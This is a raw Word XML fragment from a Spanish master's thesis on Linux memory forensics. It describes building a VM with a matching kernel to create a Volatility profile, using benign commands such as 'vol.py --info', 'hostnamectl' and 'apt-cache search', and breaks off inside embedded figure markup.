          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>] [</w:t>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155733977 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia XIV.</w:t>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432FD521" w14:textId="58FD7901" w:rsidR="009D1689" w:rsidRPr="009D1689" w:rsidRDefault="009D1689" w:rsidP="009D1689">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Crear un perfil de volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</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9D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es fundamental para poder extraer la información de los datos de la </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="009D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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9D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC8D2E5" w14:textId="7D710728" w:rsidR="009D1689" w:rsidRPr="009D1689" w:rsidRDefault="009D1689" w:rsidP="009D1689">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En el repositorio de </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="009D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GitHub</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>GitHub: Plataforma de desarrollo colaborativo para alojar proyectos utilizando el sistema de control de versiones Git.</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9D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</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9D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> podemos observar perfiles relativos a </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="009D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, pero ninguno relativo al sistema operativo linux. Si ejecutamos el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="004B3C7C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --info</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tenemos la siguiente respuesta relativo a perfiles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1F208D" w14:textId="09B432DC" w:rsidR="008235EF" w:rsidRPr="002D5E49" w:rsidRDefault="008235EF" w:rsidP="009D1689">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D5E49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[Anexo</w:t>
      </w:r>
      <w:r w:rsidR="002D5E49" w:rsidRPr="002D5E49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D5E49" w:rsidRPr="002D5E49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002D5E49" w:rsidRPr="002D5E49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155717596 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidR="002D5E49" w:rsidRPr="002D5E49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="002D5E49" w:rsidRPr="002D5E49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>V. Comando vol.py –info.</w:t>
      </w:r>
      <w:r w:rsidR="002D5E49" w:rsidRPr="002D5E49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002D5E49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E4F171" w14:textId="1B43025C" w:rsidR="009D1689" w:rsidRPr="009D1689" w:rsidRDefault="009D1689" w:rsidP="009D1689">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Como ya hemos observado en la sección anterior, el kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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9D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="009D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> la memoria 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9D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a analizar es del tipo </w:t>
      </w:r>
      <w:r w:rsidRPr="004B3C7C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linux version 4.15.0-1021.21-aws</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, además, se puede en el comando citado que este perfil no aparece en volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</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9D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> por </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="009D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>defecto,</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> basándome en las páginas web de referencias </w:t>
      </w:r>
      <w:r w:rsidR="000E1874">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XII y XIII</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1689">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, procederé a crear un perfil adaptado para esta memoria RAM. Estas acciones, deben de ser una práctica común para capturas de memoria de sistemas operativos del tipo Linux, por lo que se ha considerado recomendable introducirlo en el cuerpo del TFM, además que ya forma parte del trabajo de investigación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496270A0" w14:textId="52627EFC" w:rsidR="00E82E18" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="009B1250">
        <w:t>Creación de la máquina virtual, búsqueda en cache e instalación del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:t xml:space="preserve"> relativo al perfil a crear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCF1086" w14:textId="102F2949" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Procedo a</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> crear una VM para generar una base con el mismo kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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9B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> que el servidor auditado. Lo configuraremos según la siguiente imagen, finalmente procederemos a su arranque para su instalación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2273163F" w14:textId="6C846FB7" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Procedemos a ejecutar el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="005E7F53">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>hostnamectl</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> para ver las características que ahora mismo tenemos instalada en la VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4DC766" w14:textId="641F2556" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Como se observa en la imagen anterior, este servidor utiliza el </w:t>
      </w:r>
      <w:r w:rsidRPr="00403D77">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00403D77">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux 4.15.0-213-generic</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, por lo </w:t>
      </w:r>
      <w:r w:rsidR="0098259F" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>que,</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> para obtener el perfil de la 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9B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, tendremos que instalar un kernel distinto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB1D8E4" w14:textId="0280B482" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Procedemos a arrancar la VM, una vez realizado el login, procedemos a ejecutar el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00403D77">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo apt-cache search linux-image | grep 4.15.0-1021</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4126E102" w14:textId="12AFA37B" w:rsidR="009B1250" w:rsidRPr="00403D77" w:rsidRDefault="00831684" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251707392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16839655" wp14:editId="2A0D169C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>848415</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5765165" cy="2762885"/>
                <wp:effectExtent l="0" t="0" r="6985" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="544936333" name="Grupo 15"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5765165" cy="2762885"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5765165" cy="2764160"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvPr id="1832159156" name="Grupo 20"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5765165" cy="2764160"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="5765330" cy="2764188"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="202224276" name="Imagen 9"/>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15908"/>
                              <a:ext cx="3076575" cy="2748280"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="1828120151" name="Imagen 10" descr="Texto&#10;&#10;Descripción generada automáticamente"/>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3204375" y="0"/>
                              <a:ext cx="2560955" cy="1038860"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                      </wpg:grpSp>
                      <wps:wsp>
                        <wps:cNvPr id="1467919560" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3217653" y="1673524"/>
                            <a:ext cx="2393315" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="00068EC0" w14:textId="046AF922" w:rsidR="00C04AFA" w:rsidRPr="00921489" w:rsidRDefault="00C04AFA" w:rsidP="00C04AFA">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>12</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="41" w:name="_Toc155782579"/>
                              <w:r w:rsidRPr="00913473">
                                <w:t xml:space="preserve">Características VM Ubuntu Server y </w:t>
                              </w:r>
                              <w:r w:rsidR="00501A15">
                                <w:t>k</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00913473">
                                <w:t>ernel inicial instalado.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6839655" id="Grupo 15" o:spid="_x0000_s1050" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:66.8pt;width:453.95pt;height:217.55pt;z-index:251707392;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-height-relative:margin" coordsize="57651,27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2o+5EQQAAHQLAAAOAAAAZHJzL2Uyb0RvYy54bWzUVt1u2zYUvh+wdyA0&#10;YHeNLclybC1O4TlLECBogyVDr2mKsohKJEfSsbO32TPsEfpi+0hJ9mw3WNflpheWD//P+c73HfLi&#10;7bapyRM3Vig5i+KzYUS4ZKoQcjWLfnu8fjOJiHVUFrRWks+iZ26jt5fff3ex0TlPVKXqghuCTaTN&#10;N3oWVc7pfDCwrOINtWdKc4nBUpmGOjTNalAYusHuTT1IhsPxYKNMoY1i3Fr0XrWD0WXYvyw5c+/L&#10;0nJH6lkE31z4mvBd+u/g8oLmK0N1JVjnBv0KLxoqJA7dbXVFHSVrI062agQzyqrSnTHVDFRZCsZD&#10;DIgmHh5Fc2PUWodYVvlmpXcwAdojnL56W/bu6cboB31vgMRGr4BFaPlYtqVp/D+8JNsA2fMOMr51&#10;hKEzOx9n8TiLCMNYcj5OJpOsBZVVQP5kHat+eWHlKB6HdAz6gwcH7uwarZvw+94QUYBzkzSJs2mc&#10;jSMiaQOO3Zi1ViQJu/llrx1j7ynNvyTGNAXvOnRG8WTi0XkhRi1Yjl+XZ1gnef53PWCVWxsedZs0&#10;X7RHQ83HtX4DSmrqxFLUwj0HeYF83in5dC/YvWkbe+iTYZIkI2S9R/62oSsuydTH6Nf5qe1C6gO7&#10;U+yjJVItKipXfG415IkEBkQOpw988+DUZS30tahrT0hvd/FBykdS+AxErcyuFFs3XLq2bhheI1Ql&#10;bSW0jYjJebPkoJO5LYJDNLfOcMcqf2CJg3+Fs23qdgPBy71j3mcLJb2oHdB0GPJP814/6RACOt/p&#10;ZzRJJocqAHDGuhuuGuINOAg/kBaa06c723nUTwGz9k4EE802FTC+GV7FQCFGPcziI2LFkFLBLUPW&#10;H4Gg+vGH7fyn8LnyvUIz8ekvScBBbmhBCV071Xz60wmGwiAd/7Z5mXj3X5eXaTIcpZ5+p5U9ycbD&#10;adYxMx6mk8lRfX4NZu5rvC/reALYXthonUj7P91yDxXVHELx2+5LVjwan0/jKWLrqbVY08Io0Io4&#10;TykS1N8t8vcicdufFW66Xf8LEsctBCmnAcp4fJ5myajNVy/1JJ2madwBOoqzZPq/lA4iqFoUfU30&#10;JWBRG/JE8dLZVKIlOy6ag1m19AySy